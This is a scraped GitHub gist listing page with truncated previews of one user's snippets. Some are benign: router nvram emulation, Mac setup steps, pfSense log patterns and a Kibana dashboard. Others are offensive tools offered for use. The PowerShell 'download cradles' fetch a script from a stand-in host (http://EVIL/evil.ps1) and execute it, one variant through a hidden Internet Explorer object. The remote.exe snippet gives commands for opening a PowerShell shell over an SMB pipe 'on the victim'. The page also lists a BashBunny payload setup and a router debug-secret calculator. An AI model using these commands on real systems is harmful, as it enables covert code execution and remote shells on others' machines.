kost
kost / DownloadCradles.ps1
Created April 8, 2017 15:12 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@kost
kost / bashbunnyquickstart.md
Last active April 8, 2017 15:10 — forked from tkisason/bashbunnyquickstart.md
BashBunny quickstart tutorial

Custom languages don't work without bbpayload.

  1. Fetch the bashbunny payloads:
     git clone https://github.com/hak5/bashbunny-payloads.git
  2. Slide the switch to arming position (all the way to the usb plug)
  3. Move the contents of payloads/library/DuckyInstall to the payloads/switch1 directory in the bunny
#!/usr/bin/env ruby
# Filter Nessus XML report to get services identified
# Copyright (C) Kost
require 'nokogiri'
require 'optparse'
require 'logger'
require 'csv'
@kost
kost / zynsecrets.c
Created March 13, 2017 14:46
Calculate Bootbase/bootext secret for debug commands (ATEN 1,xxxx) - Zyxel, Huawei, ZTE, etc. - similar to zynpass but working for larger devices
/*
Calculate Bootbase/bootext secret for debug commands
Zyxel, Huawei, ZTE, etc.
Usage:
$ gcc zynsecrets.c -o zynsecrets
$ ./zynsecrets 000102030403
Copyright (C) Kost, https://gist.github.com/kost
@kost
kost / nvram
Created January 31, 2017 06:40
#!/bin/sh
# nvram emulation shell script (c) kost, https://gist.github.com/kost
#
# Usage (on real device dump the content): nvram show > /tmp/nvram.file
# Copy script and /tmp/nvram.file to the emulation env, start using it
# In case you just need nvram command emulation, just copy script.
#
# uncomment for debug:
# set -x
@kost
kost / mac-setup.md
Created November 30, 2016 11:38 — forked from todc/mac-setup.md
Fresh Mac OS Setup

1. Run Software Update

Make sure everything is up to date.

Software Update

2. Install Xcode and its "Command Line Tools"

  1. Go to App Store and install Xcode.
  2. Open and accept the terms
@kost
kost / gist:9139f9ec5fa1afac38659c669a70234b
Created November 22, 2016 10:30 — forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@kost
kost / pfsense2-2.grok
Created November 8, 2016 09:44 — forked from elijahpaul/pfsense2-2.grok
pfSense 2.2 GROK Pattern
# GROK match pattern for logstash.conf filter: %{PFSENSE_LOG_DATA}%{PFSENSE_IP_SPECIFIC_DATA}%{PFSENSE_IP_DATA}%{PFSENSE_PROTOCOL_DATA}
# GROK Custom Patterns (add to patterns directory and reference in GROK filter for pfSense events):
# GROK Patterns for pfSense 2.2 Logging Format
#
# Created 27 Jan 2015 by J. Pisano (Handles TCP, UDP, and ICMP log entries)
# Edited 14 Feb 2015 by Elijah Paul elijah.paul@gmail.com
# Edited 10 Mar 2015 by Bernd Zeimetz <bernd@bzed.de>
# taken from https://gist.github.com/elijahpaul/f5f32d4e914dcb7fedd2
@kost
kost / pfsense_kibana_dash_v1.json
Created November 8, 2016 09:43 — forked from elijahpaul/pfsense_kibana_dash_v1.json
pfSense firewall dashboard (Kibana)
{
"title": "PFSense Firewall",
"services": {
"query": {
"idQueue": [],
"list": {
"0": {
"query": "tags: \"PFSense\" AND action: \"pass\"",
"alias": "Passed",
"color": "#6ED0E0",
# basic pfctl control
# ==
# Related: http://www.OpenBSD.org
# Last update: Tue Dec 28, 2004
# ==
# Note:
# this document is only provided as a basic overview
# for some common pfctl commands and is by no means
# a replacement for the pfctl and pf manual pages.